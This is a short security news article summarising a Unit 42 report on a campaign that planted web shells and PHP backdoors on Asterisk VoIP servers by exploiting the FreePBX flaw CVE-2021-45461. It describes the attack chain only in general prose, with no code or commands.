A web shell was dropped on the servers of VoIP phones running Digium’s software as part of an attack operation meant to exfiltrate data by downloading and running additional payloads. Palo Alto Networks Unit 42 claimed in a report on Friday that the malware downloads new payloads for execution, installs multilayer obfuscated PHP backdoors into the web server file system, and schedules repeating activities to re-infect the host system.
Asterisk, a popular software implementation of a private branch exchange (PBX) that operates on the open-source Elastix Unified Communications Server, is the focus of the strange behavior, which is reported to have started around mid-December 2021. Unit 42 made a suggestion that the breaches may be a “resurgence” of the earlier attacks by comparing them to the INJ3CTOR3 campaign, which Israeli cybersecurity firm Check Point announced in November 2020.
The abrupt increase is related to the December 2021 public exposure of a now-patched remote code execution vulnerability in FreePBX, an open-source web-based GUI used to monitor and manage Asterisk. The flaw, identified as CVE-2021-45461, has a severity rating of 9.8 out of 10. The attacks begin with a remote server being used to retrieve the first dropper shell script, which is then used to install the PHP web shell in various areas throughout the file system and to create two root user accounts for further remote access.
Additionally, a minutely running scheduled job is created that obtains a remote copy of the attacker-controlled domain’s shell script for execution. The malware may execute arbitrary instructions in addition to taking steps to hide its tracks, which eventually enables the hackers to seize control of the system, steal data, and keep a backdoor to the infected hosts.
“The strategy of implanting web shells in vulnerable servers is not a new tactic for malicious actors,” said the researchers, adding it’s a “common approach malware authors take to launch exploits or run commands remotely.”